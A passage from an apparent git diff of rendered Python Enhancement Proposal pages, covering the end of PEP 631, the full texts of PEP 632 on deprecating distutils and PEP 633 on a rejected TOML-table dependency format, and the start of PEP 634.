+  'PyYAML >= 3.10, < 6',
+  'python-dotenv >= 0.13.0, < 1',
+  'requests >= 2.20.0, < 3',
+  'texttable >= 0.9.0, < 2',
+  'websocket-client >= 0.32.0, < 1',
+
+  # Conditional
+  'backports.shutil_get_terminal_size == 1.0.0; python_version < "3.3"',
+  'backports.ssl_match_hostname >= 3.5, < 4; python_version < "3.5"',
+  'colorama >= 0.4, < 1; sys_platform == "win32"',
+  'enum34 >= 1.0.4, < 2; python_version < "3.4"',
+  'ipaddress >= 1.0.16, < 2; python_version < "3.3"',
+  'subprocess32 >= 3.5.4, < 4; python_version < "3.2"',
+]
+
+[project.optional-dependencies]
+socks = [ 'PySocks >= 1.5.6, != 1.5.7, < 2' ]
+tests = [
+  'ddt >= 1.2.2, < 2',
+  'pytest < 6',
+  'mock >= 1.0.1, < 4; python_version < "3.4"',
+]
+
+
+
+
+

Implementation

+
+

Parsing

+
from packaging.requirements import InvalidRequirement, Requirement
+
+def parse_dependencies(config):
+    dependencies = config.get('dependencies', [])
+    if not isinstance(dependencies, list):
+        raise TypeError('Field `project.dependencies` must be an array')
+
+    for i, entry in enumerate(dependencies, 1):
+        if not isinstance(entry, str):
+            raise TypeError(f'Dependency #{i} of field `project.dependencies` must be a string')
+
+        try:
+            Requirement(entry)
+        except InvalidRequirement as e:
+            raise ValueError(f'Dependency #{i} of field `project.dependencies` is invalid: {e}')
+
+    return dependencies
+
+def parse_optional_dependencies(config):
+    optional_dependencies = config.get('optional-dependencies', {})
+    if not isinstance(optional_dependencies, dict):
+        raise TypeError('Field `project.optional-dependencies` must be a table')
+
+    optional_dependency_entries = {}
+
+    for option, dependencies in optional_dependencies.items():
+        if not isinstance(dependencies, list):
+            raise TypeError(
+                f'Dependencies for option `{option}` of field '
+                '`project.optional-dependencies` must be an array'
+            )
+
+        entries = []
+
+        for i, entry in enumerate(dependencies, 1):
+            if not isinstance(entry, str):
+                raise TypeError(
+                    f'Dependency #{i} of option `{option}` of field '
+                    '`project.optional-dependencies` must be a string'
+                )
+
+            try:
+                Requirement(entry)
+            except InvalidRequirement as e:
+                raise ValueError(
+                    f'Dependency #{i} of option `{option}` of field '
+                    f'`project.optional-dependencies` is invalid: {e}'
+                )
+            else:
+                entries.append(entry)
+
+        optional_dependency_entries[option] = entries
+
+    return optional_dependency_entries
+
+
+
+
+

Metadata

+
def construct_metadata_file(metadata_object):
+    """
+    https://packaging.python.org/specifications/core-metadata/
+    """
+    metadata_file = 'Metadata-Version: 2.1\n'
+
+    ...
+
+    if metadata_object.dependencies:
+        # Sort dependencies to ensure reproducible builds
+        for dependency in sorted(metadata_object.dependencies):
+            metadata_file += f'Requires-Dist: {dependency}\n'
+
+    if metadata_object.optional_dependencies:
+        # Sort extras and dependencies to ensure reproducible builds
+        for option, dependencies in sorted(metadata_object.optional_dependencies.items()):
+            metadata_file += f'Provides-Extra: {option}\n'
+            for dependency in sorted(dependencies):
+                if ';' in dependency:
+                    metadata_file += f'Requires-Dist: {dependency} and extra == "{option}"\n'
+                else:
+                    metadata_file += f'Requires-Dist: {dependency}; extra == "{option}"\n'
+
+    ...
+
+    return metadata_file
+
+
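As a sketch of the expected result, running the tests extra from the earlier optional-dependencies example through the loop above would emit the following (illustrative only; none of these entries contain a semicolon, so the else branch applies):

+
optional_dependencies = {'tests': ['pytest', 'coverage>=5.0.3']}
+
+metadata_file = ''
+for option, dependencies in sorted(optional_dependencies.items()):
+    metadata_file += f'Provides-Extra: {option}\n'
+    for dependency in sorted(dependencies):
+        metadata_file += f'Requires-Dist: {dependency}; extra == "{option}"\n'
+
+print(metadata_file, end='')
+# Provides-Extra: tests
+# Requires-Dist: coverage>=5.0.3; extra == "tests"
+# Requires-Dist: pytest; extra == "tests"
+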
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0631.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0632/index.html b/pep-0632/index.html new file mode 100644 index 00000000000..c2c128f721a --- /dev/null +++ b/pep-0632/index.html @@ -0,0 +1,376 @@ + PEP 632 – Deprecate distutils module | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 632 – Deprecate distutils module

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
03-Sep-2020
+
Python-Version:
+
3.10
+
Post-History:
+
03-Sep-2020, 22-Jan-2021
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

The distutils module [1] has for a long time recommended using the +setuptools package [2] instead. Setuptools has recently integrated a +complete copy of distutils and is no longer dependent on the standard +library [3]. Pip has been silently replacing distutils with +setuptools when installing packages for a long time already, and the +distutils documentation has stated since 2014 (or earlier) that it is +being phased out. It is time to remove it from the standard library.

+
+
+

Motivation

+

distutils [1] is a largely undocumented and unmaintained collection +of utilities for packaging and distributing Python packages, including +compilation of native extension modules. It defines a configuration +format that describes a Python distribution and provides the tools to +convert a directory of source code into a source distribution, and +some forms of binary distribution. Because of its place in the +standard library, many updates can only be released with a major +release, and users cannot rely on particular fixes being available.

+

setuptools [2] is a better documented and well maintained enhancement +based on distutils. While it provides very similar functionality, it +is much better able to support users on earlier Python releases, and +can respond to bug reports more quickly. A number of platform-specific +enhancements already exist in setuptools that have not been added to +distutils, and there has been a long-standing recommendation in the +distutils documentation to prefer setuptools.

+

Historically, setuptools has extended distutils using subclassing and +monkeypatching, but has now taken a copy of the underlying code. [3] +As a result, the second-to-last major dependency on distutils is gone and +there is no need to keep it in the standard library.

+

The final dependency on distutils is CPython itself, which uses it to +build native extension modules in the standard library (except on +Windows). Because this is a CPython build-time dependency, it is +possible to continue to use distutils for this specific case without +it being part of the standard library.

+

Deprecation and removal will make it obvious that issues should be +fixed in the setuptools project, and will reduce a source of bug +reports and unnecessary test maintenance. It will also help promote +the development of alternative build backends, which can now be +supported more easily thanks to PEP 517.

+
+
+

Specification

+

In Python 3.10 and 3.11, distutils will be formally marked as +deprecated. All known issues will be closed at this time. +import distutils will raise a deprecation warning. New issues that +would be considered release blocking may still be fixed, but support +for new tools or platforms will not be added.

+

During Python 3.10 and 3.11, uses of distutils within the standard +library may change to use alternative APIs.

+

In Python 3.12, distutils will no longer be installed by make +install or any of the first-party distributions. Third-party +redistributors should no longer include distutils in their bundles or +repositories.

+

This PEP makes no specification on migrating the parts of the CPython +build process that currently use distutils. Depending on +contributions, this migration may occur at any time.

+

After Python 3.12 is started and when the CPython build process no +longer depends on distutils being in the standard library, the entire +Lib/distutils directory and Lib/test/test_distutils.py file +will be removed from the repository.

+

Other references to distutils will be cleaned up. As of Python 3.9’s +initial release, the following modules have references in code or +comments:

+
    +
  • Lib/ctypes/util.py
  • +
  • Lib/site.py
  • +
  • Lib/sysconfig.py
  • +
  • Lib/_aix_support.py
  • +
  • Lib/_bootsubprocess.py
  • +
  • Lib/_osx_support.py
  • +
  • Modules/_decimal/tests/formathelper.py
  • +
+

The following Tools in CPython also refer to distutils. Note that none +of these are installed with CPython:

+
    +
  • PC/layout (references will be removed)
  • +
  • Tools/msi (references will be removed)
  • +
  • Tools/peg_generator (will be adapted to a different build tool)
  • +
  • Tools/test2to3 (example project will be removed)
  • +
+

As the distutils code is already included in setuptools, there is no +need to republish it in any other form. Those who require access to +the functionality should use setuptools or an alternative build +backend.

+
+
+

Backwards Compatibility

+

Code that imports distutils will no longer work from Python 3.12.

+

The suggested migration path is to use the equivalent (though not +identical) imports from setuptools (see [5]), or to migrate to an +alternative build backend (see PEP 517).

+

Code already exists in setuptools to transparently switch setup.py +files using distutils onto their equivalents, and so most working +build scripts are already known to work with setuptools. Such scripts +may need to update their import statements. Consult the setuptools +documentation for specific migration advice. [5]

+

Some projects use alternate sets of patches over distutils, notably, +numpy.distutils. [6] Projects that we know are doing this have been +informed.

+

Many build scripts use custom commands or narrowly scoped patches. As +these packages are already subject to setuptools overriding distutils, +we expect minimal disruption as a result of distutils being removed. +Scripts may still need to be updated to avoid importing distutils.

+
+
+

Reference Implementation

+

setuptools version 48 includes the complete copy of distutils, and as +such is no longer dependent on the standard library’s copy. Most +implementation issues they have faced are due to the continuing +existence of distutils in the standard library, and so removal will +improve the stability of their implementation.

+

There is not yet a reference implementation for the removal of +distutils from the standard library, nor is there an implementation +for CPython’s native module builds without relying on the standard +library copy of distutils.

+
+
+

Migration Advice

+
+

Note

+

This section suggests some alternative replacements for popular +functionality that is being formally deprecated with this PEP. It +is current at the time of writing, but is not kept up to date.

+
+

For these modules or types, setuptools is the best substitute:

+
    +
  • distutils.ccompiler
  • +
  • distutils.cmd.Command
  • +
  • distutils.command
  • +
  • distutils.config
  • +
  • distutils.core.Distribution
  • +
  • distutils.errors
  • +
+

For these modules or types, use the standards-defined Python Packaging +Authority packages specified:

+
    +
  • distutils.version — use the packaging package
  • +
+

For these modules or functions, use the standard library module shown:

+
    +
  • distutils.fancy_getopt — use the argparse module
  • +
  • distutils.spawn.find_executable — use the shutil.which function
  • +
  • distutils.spawn.spawn — use the subprocess.run function
  • +
  • distutils.sysconfig — use the sysconfig module
  • +
  • distutils.util.get_platform — use the platform module
  • +
+
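A minimal sketch of two of the standard library replacements above (the modules and functions named are real; the particular lookups are illustrative):

+
import shutil
+import sysconfig
+
+compiler = shutil.which('gcc')               # was: distutils.spawn.find_executable('gcc')
+include_dir = sysconfig.get_path('include')  # was: distutils.sysconfig.get_python_inc()
+print(compiler, include_dir)
+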

For these functions, and any others not mentioned here, you will need +to reimplement the functionality yourself. The legacy documentation +can be found at https://docs.python.org/3.9/distutils/apiref.html

+
    +
  • distutils.dir_util.create_tree
  • +
  • distutils.util.change_root
  • +
  • distutils.util.strtobool
  • +
+
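For example, a minimal reimplementation of distutils.util.strtobool, based on the behavior described in the legacy documentation, could look like this (a sketch, not a guaranteed drop-in):

+
def strtobool(val):
+    """Convert a string representation of truth to 1 or 0."""
+    val = val.lower()
+    if val in ('y', 'yes', 't', 'true', 'on', '1'):
+        return 1
+    if val in ('n', 'no', 'f', 'false', 'off', '0'):
+        return 0
+    raise ValueError(f'invalid truth value {val!r}')
+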
+
+

Rejected Ideas

+
+

Deprecate but do not delete

+

The primary concern with this approach is that distutils most +frequently breaks because of platform differences, which means that +without maintenance, it will stop working out-of-sync with any +Python release. This makes it impossible for libraries to reliably +detect when they will stop working.

+

In contrast, this PEP proposes a concrete date, known well in advance, +when distutils will stop working, and commits to not breaking the API +before that time. This gives maintainers a predictable schedule, +ensures any breakage occurs at a point where users will already be +expecting changed behavior, and provides a reliable detection +mechanism (specifically, that import distutils raises).

+

Finally, as long as distutils remains in the standard library in any +form, it will interfere with third-party packages that provide shims +or replacements, including setuptools. Completely removing the +package at a known version makes it possible for third-parties to +safely use a substitute.

+
+
+

Only deprecate the setuptools-like functionality

+

This suggestion assumes that there exists a volunteer to maintain +whatever is left, which is not true. It also implies that anybody +knows which functionality should remain, which as seen in the +discussions is not at all clear.

+

Most helper functions in distutils already have supported (and +improved) alternatives, often in the standard library, and there is +little that can be done to the legacy versions without breaking +compatibility. (And any break requiring maintainers to update their +code is essentially equivalent to requiring them to import a different +function.)

+

The last point from the previous section also applies here.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0632.rst

+

Last modified: 2023-10-10 11:05:14 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0633/index.html b/pep-0633/index.html new file mode 100644 index 00000000000..54fabcf769d --- /dev/null +++ b/pep-0633/index.html @@ -0,0 +1,815 @@ + PEP 633 – Dependency specification in pyproject.toml using an exploded TOML table | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 633 – Dependency specification in pyproject.toml using an exploded TOML table

+
+
Author:
+
Laurie Opperman <laurie_opperman at hotmail.com>, +Arun Babu Neelicattu <arun.neelicattu at gmail.com>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
02-Sep-2020
+
Post-History:
+
02-Sep-2020
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP has been rejected in favour of PEP 631, owing to that proposal's popularity, +its consistency with the existing usage of PEP 508 strings, and its compatibility +with existing packaging tool suites.

+
+
+

Abstract

+

This PEP specifies how to write a project’s dependencies in a +pyproject.toml file for packaging-related tools to consume using the fields +defined in PEP 621, as an alternative to the PEP 508-based approach +defined in PEP 631.

+
+
+

Motivation

+

There are multiple benefits to using TOML tables and other data-types to +represent requirements rather than PEP 508 strings:

+
    +
  • Easy initial validation via the TOML syntax.
  • +
  • Easy secondary validation using a schema, for example a JSON Schema.
  • +
  • Potential for users to guess the keys of given features, rather than +memorising a syntax.
  • +
  • Users of multiple other popular languages may already be familiar with the +TOML syntax.
  • +
  • TOML directly represents the same data structures as in JSON, and therefore a +sub-set of Python literals, so users can understand the hierarchy and type of +value
  • +
+
+
+

Rationale

+

Most of this is taken from discussions in the PEP 621 dependencies topic. +This has elements from Pipfile, Poetry, Dart’s dependencies and +Rust’s Cargo. A comparison document shows advantages and disadvantages +between this format and PEP 508-style specifiers.

+

In the specification of multiple requirements with the same distribution name +(where environment markers choose the appropriate dependency), the chosen +solution is similar to Poetry’s, where an array of requirements is allowed.

+

The direct-reference keys closely align with and utilise PEP 610 and +PEP 440 as to reduce differences in the packaging ecosystem and rely on +previous work in specification.

+
+
+

Specification

+

As in PEP 621, if metadata is improperly specified then tools MUST raise an +error. The metadata MUST conform to the TOML specification.

+

To reduce confusion with this document being a specification for specifying +dependencies, the word “requirement” is used to mean a PEP 508 dependency +specification.

+

The following tables are added to the project table specified in +PEP 621.

+
+

dependencies

+

Format: table

+

The keys inside this table are the names of the required distribution. The +values can have one of the following types:

+
    +
  • string: the requirement is defined only by a version requirement, with the same +specification as version in the requirement table, except allowing the +empty string "" to place no restriction on the version.
  • +
  • table: a requirement table.
  • +
  • array: an array of requirement tables. It is an error to specify an empty +array [] as a value.
  • +
+
+

Requirement table

+

The keys of the requirement table are as follows (all are optional):

+
    +
  • version (string): a PEP 440 version specifier, which is a +comma-delimited list of version specifier clauses. The string MUST be +non-empty.
  • +
  • extras (array of strings): a list of PEP 508 extras declarations for +the distribution. The list MUST be non-empty.
  • +
  • markers (string): a PEP 508 environment marker expression. The string +MUST be non-empty.
  • +
  • url (string): the URL of the artifact to install and satisfy the +requirement. Note that file:// is the prefix used for packages to be +retrieved from the local filesystem.
  • +
  • git, hg, bzr or svn (string): the URL of a VCS repository +(as specified in PEP 440) +to clone, whose tree will be installed to satisfy the requirement. Further +VCS keys will be added via amendments to PEP 610; however, tools MAY opt to +support other VCSs using their command-line command prior to the acceptance +of the amendment.
  • +
  • revision (string): the identifier for a specific revision of the +specified VCS repository to check-out before installation. Users MUST only +provide this when one of git, hg, bzr, svn, or another VCS +key is used to identify the distribution to install. Revision identifiers are +suggested in PEP 610.
  • +
+

At most one of the following keys can be specified simultaneously, as they +logically conflict with each other in the requirement: version, url, +git, hg, bzr, svn, and any other VCS key.

+

An empty requirement table {} places no restriction on the requirement, in +addition to the empty string "".

+

Any keys provided which are not specified in this document MUST cause an error +in parsing.

+
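A minimal sketch of these validation rules (the helper name and messages are hypothetical, not part of this specification):

+
ALLOWED_KEYS = {'version', 'extras', 'markers', 'url',
+                'git', 'hg', 'bzr', 'svn', 'revision'}
+EXCLUSIVE_KEYS = {'version', 'url', 'git', 'hg', 'bzr', 'svn'}
+
+def validate_requirement_table(table):
+    unknown = set(table) - ALLOWED_KEYS
+    if unknown:
+        raise ValueError(f'unknown requirement keys: {sorted(unknown)}')
+    conflicting = EXCLUSIVE_KEYS & set(table)
+    if len(conflicting) > 1:
+        raise ValueError(f'conflicting requirement keys: {sorted(conflicting)}')
+    # An empty table {} is valid: it places no restriction.
+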
+
+
+

optional-dependencies

+

Format: table

+

The keys inside this table are the names of an extra’s required distribution. +The values can have one of the following types:

+
    +
  • table: a requirement table.
  • +
  • array: an array of requirement tables.
  • +
+

These requirement tables have +the same specification as above, with the addition of +the following required key:

+
    +
  • for-extra (string): the name of the PEP 508 extra that this +requirement is required for.
  • +
+
+
+
+

Reference implementation

+

Tools will need to convert this format to PEP 508 requirement strings. Below +is an example implementation of that conversion (assuming validation is already +performed):

+
def convert_requirement_to_pep508(name, requirement):
+    if isinstance(requirement, str):
+        requirement = {"version": requirement}
+    pep508 = name
+    if "extras" in requirement:
+        pep508 += " [" + ", ".join(requirement["extras"]) + "]"
+    if "version" in requirement:
+        pep508 += " " + requirement["version"]
+    if "url" in requirement:
+        pep508 += " @ " + requirement["url"]
+    for vcs in ("git", "hg", "bzr", "svn"):
+        if vcs in requirement:
+            pep508 += " @ " + vcs + "+" + requirement[vcs]
+            if "revision" in requirement:
+                pep508 += "@" + requirement["revision"]
+    extra = None
+    if "for-extra" in requirement:
+        extra = requirement["for-extra"]
+    if "markers" in requirement:
+        markers = requirement["markers"]
+        if extra:
+            markers = "extra = '" + extra + "' and (" + markers + ")"
+        pep508 += "; " + markers
+    return pep508, extra
+
+
+def convert_requirements_to_pep508(dependencies):
+    pep508s = []
+    extras = set()
+    for name, req in dependencies.items():
+        if isinstance(req, list):
+            for sub_req in req:
+                pep508, extra = convert_requirement_to_pep508(name, sub_req)
+                pep508s.append(pep508)
+                if extra:
+                    extras.add(extra)
+        else:
+            pep508, extra = convert_requirement_to_pep508(name, req)
+            pep508s.append(pep508)
+            if extra:
+                extras.add(extra)
+    return pep508s, extras
+
+
+def convert_project_requirements_to_pep508(project):
+    reqs, _ = convert_requirements_to_pep508(project.get("dependencies", {}))
+    optional_reqs, extras = convert_requirements_to_pep508(
+        project.get("optional-dependencies", {})
+    )
+    reqs += optional_reqs
+    return reqs, extras
+
+
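A hypothetical invocation of the conversion above, on a small already-parsed project table:

+
project = {
+    'dependencies': {
+        'numpy': '~=1.18',
+        'aiohttp': {'version': '>= 3.6.2', 'extras': ['speedups']},
+    },
+    'optional-dependencies': {
+        'pytest': {'version': '< 6', 'for-extra': 'tests'},
+    },
+}
+
+reqs, extras = convert_project_requirements_to_pep508(project)
+print(reqs)    # ['numpy ~=1.18', 'aiohttp [speedups] >= 3.6.2', 'pytest < 6']
+print(extras)  # {'tests'}
+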
+
+

JSON schema

+

For initial validation, a JSON-schema can be used. Not only does this help +tools have a consistent validation, but it allows code editors to highlight +validation errors as users are building the dependencies list.

+
{
+    "$id": "spam",
+    "$schema": "http://json-schema.org/draft-07/schema#",
+    "title": "Project metadata",
+    "type": "object",
+    "definitions": {
+        "requirementTable": {
+            "title": "Full project dependency specification",
+            "type": "object",
+            "properties": {
+                "extras": {
+                    "title": "Dependency extras",
+                    "type": "array",
+                    "items": {
+                        "title": "Dependency extra",
+                        "type": "string"
+                    }
+                },
+                "markers": {
+                    "title": "Dependency environment markers",
+                    "type": "string"
+                }
+            },
+            "propertyNames": {
+                "enum": [
+                    "extras",
+                    "markers",
+                    "version",
+                    "url",
+                    "git",
+                    "hg",
+                    "bzr",
+                    "svn",
+                    "for-extra"
+                ]
+            },
+            "oneOf": [
+                {
+                    "title": "Version requirement",
+                    "properties": {
+                        "version": {
+                            "title": "Version",
+                            "type": "string"
+                        }
+                    }
+                },
+                {
+                    "title": "URL requirement",
+                    "properties": {
+                        "url": {
+                            "title": "URL",
+                            "type": "string",
+                            "format": "uri"
+                        }
+                    },
+                    "required": [
+                        "url"
+                    ]
+                },
+                {
+                    "title": "VCS requirement",
+                    "properties": {
+                        "revision": {
+                            "title": "VCS repository revision",
+                            "type": "string"
+                        }
+                    },
+                    "oneOf": [
+                        {
+                            "title": "Git repository",
+                            "properties": {
+                                "git": {
+                                    "title": "Git URL",
+                                    "type": "string",
+                                    "format": "uri"
+                                }
+                            },
+                            "required": [
+                                "git"
+                            ]
+                        },
+                        {
+                            "title": "Mercurial repository",
+                            "properties": {
+                                "hg": {
+                                    "title": "Mercurial URL",
+                                    "type": "string",
+                                    "format": "uri"
+                                }
+                            },
+                            "required": [
+                                "hg"
+                            ]
+                        },
+                        {
+                            "title": "Bazaar repository",
+                            "properties": {
+                                "bzr": {
+                                    "title": "Bazaar URL",
+                                    "type": "string",
+                                    "format": "uri"
+                                }
+                            },
+                            "required": [
+                                "bzr"
+                            ]
+                        },
+                        {
+                            "title": "Subversion repository",
+                            "properties": {
+                                "svn": {
+                                    "title": "Subversion URL",
+                                    "type": "string",
+                                    "format": "uri"
+                                }
+                            },
+                            "required": [
+                                "svn"
+                            ]
+                        }
+                    ]
+                }
+            ]
+        },
+        "requirementVersion": {
+            "title": "Version project dependency specification",
+            "type": "string"
+        },
+        "requirement": {
+            "title": "Project dependency specification",
+            "oneOf": [
+                {
+                    "$ref": "#/definitions/requirementVersion"
+                },
+                {
+                    "$ref": "#/definitions/requirementTable"
+                },
+                {
+                    "title": "Multiple specifications",
+                    "type": "array",
+                    "items": {
+                        "$ref": "#/definitions/requirementTable"
+                    },
+                    "minLength": 1
+                }
+            ]
+        },
+        "optionalRequirementTable": {
+            "title": "Project optional dependency specification table",
+            "allOf": [
+                {
+                    "$ref": "#/definitions/requirementTable"
+                },
+                {
+                    "properties": {
+                        "for-extra": {
+                            "title": "Dependency's extra",
+                            "type": "string"
+                        }
+                    },
+                    "required": [
+                        "for-extra"
+                    ]
+                }
+            ]
+        },
+        "optionalRequirement": {
+            "title": "Project optional dependency specification",
+            "oneOf": [
+                {
+                    "$ref": "#/definitions/optionalRequirementTable"
+                },
+                {
+                    "title": "Multiple specifications",
+                    "type": "array",
+                    "items": {
+                        "$ref": "#/definitions/optionalRequirementTable"
+                    },
+                    "minLength": 1
+                }
+            ]
+        }
+    },
+    "properties": {
+        "dependencies": {
+            "title": "Project dependencies",
+            "type": "object",
+            "additionalProperties": {
+                "$ref": "#/definitions/requirement"
+            }
+        },
+        "optional-dependencies": {
+            "title": "Project dependencies",
+            "type": "object",
+            "additionalProperties": {
+                "$ref": "#/definitions/optionalRequirement"
+            }
+        }
+    }
+}
+
+
+
+
+
+

Examples

+

Full artificial example:

+
[project.dependencies]
+flask = { }
+django = { }
+requests = { version = ">= 2.8.1, == 2.8.*", extras = ["security", "tests"], markers = "python_version < '2.7'" }
+pip = { url = "https://github.com/pypa/pip/archive/1.3.1.zip" }
+sphinx = { git = "ssh://git@github.com/sphinx-doc/sphinx.git" }
+numpy = "~=1.18"
+pytest = [
+    { version = "<6", markers = "python_version < '3.5'" },
+    { version = ">=6", markers = "python_version >= '3.5'" },
+]
+
+[project.optional-dependencies]
+pytest-timeout = { for-extra = "dev" }
+pytest-mock = [
+    { version = "<6", markers = "python_version < '3.5'", for-extra = "dev" },
+    { version = ">=6", markers = "python_version >= '3.5'", for-extra = "dev" },
+]
+
+
+

In homage to PEP 631, the following is an equivalent dependencies +specification for docker-compose:

+
[project.dependencies]
+cached-property = ">= 1.2.0, < 2"
+distro = ">= 1.2.0, < 2"
+docker = { extras = ["ssh"], version = ">= 4.2.2, < 5" }
+docopt = ">= 0.6.1, < 1"
+jsonschema = ">= 2.5.1, < 4"
+PyYAML = ">= 3.10, < 6"
+python-dotenv = ">= 0.13.0, < 1"
+requests = ">= 2.20.0, < 3"
+texttable = ">= 0.9.0, < 2"
+websocket-client = ">= 0.32.0, < 1"
+
+# Conditional
+"backports.shutil_get_terminal_size" = { version = "== 1.0.0", markers = "python_version < '3.3'" }
+"backports.ssl_match_hostname" = { version = ">= 3.5, < 4", markers = "python_version < '3.5'" }
+colorama = { version = ">= 0.4, < 1", markers = "sys_platform == 'win32'" }
+enum34 = { version = ">= 1.0.4, < 2", markers = "python_version < '3.4'" }
+ipaddress = { version = ">= 1.0.16, < 2", markers = "python_version < '3.3'" }
+subprocess32 = { version = ">= 3.5.4, < 4", markers = "python_version < '3.2'" }
+
+[project.optional-dependencies]
+PySocks = { version = ">= 1.5.6, != 1.5.7, < 2", for-extra = "socks" }
+ddt = { version = ">= 1.2.2, < 2", for-extra = "tests" }
+pytest = { version = "< 6", for-extra = "tests" }
+mock = { version = ">= 1.0.1, < 4", markers = "python_version < '3.4'", for-extra = "tests" }
+
+
+
+
+

Compatibility Examples

+

The authors of this PEP recognise that various tools need to both read +from and write to this format for dependency specification. This section +aims to provide direct comparison with and examples for translating to/from +the currently used standard, PEP 508.

+
+

Note

+

For simplicity and clarity, the various ways in which TOML allows you to write each +specification are not represented. These examples use the standard inline representation.

+

For example, while the following are considered equivalent in TOML, we choose the +second form for the examples in this section.

+
aiohttp.version = "== 3.6.2"
+aiohttp = { version = "== 3.6.2" }
+
+
+
+
+

Version Constrained Dependencies

+

No Version Constraint

+
aiohttp
+
+
+
aiohttp = {}
+
+
+

Simple Version Constraint

+
aiohttp >= 3.6.2, < 4.0.0
+
+
+
aiohttp = { version = ">= 3.6.2, < 4.0.0" }
+
+
+
+

Note

+

This can, for conciseness, be also represented as a string.

+
aiohttp = ">= 3.6.2, < 4.0.0"
+
+
+
+
+
+

Direct Reference Dependencies

+

URL Dependency

+
aiohttp @ https://files.pythonhosted.org/packages/97/d1/1cc7a1f84097d7abdc6c09ee8d2260366f081f8e82da36ebb22a25cdda9f/aiohttp-3.6.2-cp35-cp35m-macosx_10_13_x86_64.whl
+
+
+
aiohttp = { url = "https://files.pythonhosted.org/packages/97/d1/1cc7a1f84097d7abdc6c09ee8d2260366f081f8e82da36ebb22a25cdda9f/aiohttp-3.6.2-cp35-cp35m-macosx_10_13_x86_64.whl" }
+
+
+

VCS Dependency

+
aiohttp @ git+ssh://git@github.com/aio-libs/aiohttp.git@master
+
+
+
aiohttp = { git = "ssh://git@github.com/aio-libs/aiohttp.git", revision = "master" }
+
+
+
+
+

Environment Markers

+
aiohttp >= 3.6.1; python_version >= '3.8'
+
+
+
aiohttp = { version = ">= 3.6.1", markers = "python_version >= '3.8'" }
+
+
+

A slightly extended example of the above, where a particular version of aiohttp is required based on the interpreter version.

+
aiohttp >= 3.6.1; python_version >= '3.8'
+aiohttp >= 3.0.0, < 3.6.1; python_version < '3.8'
+
+
+
aiohttp = [
+    { version = ">= 3.6.1", markers = "python_version >= '3.8'" },
+    { version = ">= 3.0.0, < 3.6.1", markers = "python_version < '3.8'" }
+]
+
+
+
+
+

Package Extras

+

Specifying dependency for a package extra

+
aiohttp >= 3.6.2; extra == 'http'
+
+
+
aiohttp = { version = ">= 3.6.2", for-extra = "http" }
+
+
+

Using extras from a dependency

+
aiohttp [speedups] >= 3.6.2
+
+
+
aiohttp = { version = ">= 3.6.2", extras = ["speedups"] }
+
+
+
+
+

Complex Examples

+

Version Constraint

+
aiohttp [speedups] >= 3.6.2; python_version >= '3.8' and extra == 'http'
+
+
+
aiohttp = { version = ">= 3.6.2", extras = ["speedups"], markers = "python_version >= '3.8'", for-extra = "http" }
+
+
+

Direct Reference (VCS)

+
aiohttp [speedups] @ git+ssh://git@github.com/aio-libs/aiohttp.git@master ; python_version >= '3.8' and extra == 'http'
+
+
+
aiohttp = { git = "ssh://git@github.com/aio-libs/aiohttp.git", revision = "master", extras = ["speedups"], markers = "python_version >= '3.8'", for-extra = "http" }
+
+
+
+
+
+

Rejected Ideas

+
+

Switch to an array for dependencies

+

Use an array instead of a table in order to have each element only be a table +(with a name key) and no arrays of requirement tables. This was very +verbose and restrictive in the TOML format, and having multiple requirements +for a given distribution isn’t very common.

+
+
+

Replace optional-dependencies with extras

+

Remove the optional-dependencies table in favour of both including an +optional key in the requirement and an extras table which specifies +which (optional) requirements are needed for a project’s extra. This reduces +the number of tables with the same specification (to one) and allows for +requirements to be specified once but used in multiple extras, but distances +some of the requirement’s properties (which extra(s) it belongs to), groups +required and optional dependencies together (possibly mixed), and there may not +be a simple way to choose a requirement when a distribution has multiple +requirements. This was rejected as optional-dependencies has already been +used in the PEP 621 draft.

+
+
+

direct table in requirement

+

Include the direct-reference keys in a direct table, have the VCS specified +as the value of a vcs key. This was more explicit and easier to include in +a JSON-schema validation, but was decided to be too verbose and not as +readable.

+
+
+

Include hash

+

Include hash in direct-reference requirements. This was only for package +lock-files, and didn’t really have a place in the project’s metadata.

+
+
+

Dependency tables for each extra

+

Have the optional-dependencies be a table of dependency tables for each +extra, with the table name being the extra’s name. This made +optional-dependencies a different type (table of tables of requirements) +from dependencies (table of requirements), which could be jarring for users +and harder to parse.

+
+
+

Environment marker keys

+

Make each PEP 508 environment marker a key (or child-table key) in +the requirement. This arguably increases readability and ease of parsing. +The markers key would still be allowed for more advanced specification, +and the key-specified environment markers would be and'd with its +result. This was deferred as more design needs to be undertaken.

+
+
+

Multiple extras which one requirement can satisfy

+

Replace the for-extra key with for-extras, with the value being an +array of extras which the requirement satisfies. This reduces some +duplication, but in this case that duplication makes explicit which extras +have which dependencies.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0633.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0634/index.html b/pep-0634/index.html new file mode 100644 index 00000000000..c83c2375eca --- /dev/null +++ b/pep-0634/index.html @@ -0,0 +1,756 @@ + PEP 634 – Structural Pattern Matching: Specification | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 634 – Structural Pattern Matching: Specification

+
+
Author:
+
Brandt Bucher <brandt at python.org>, +Guido van Rossum <guido at python.org>
+
BDFL-Delegate:
+

+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Sep-2020
+
Python-Version:
+
3.10
+
Post-History:
+
22-Oct-2020, 08-Feb-2021
+
Replaces:
+
622
+
Resolution:
+
Python-Committers message
+
+
+
+
Table of Contents +
+
+

Important

+

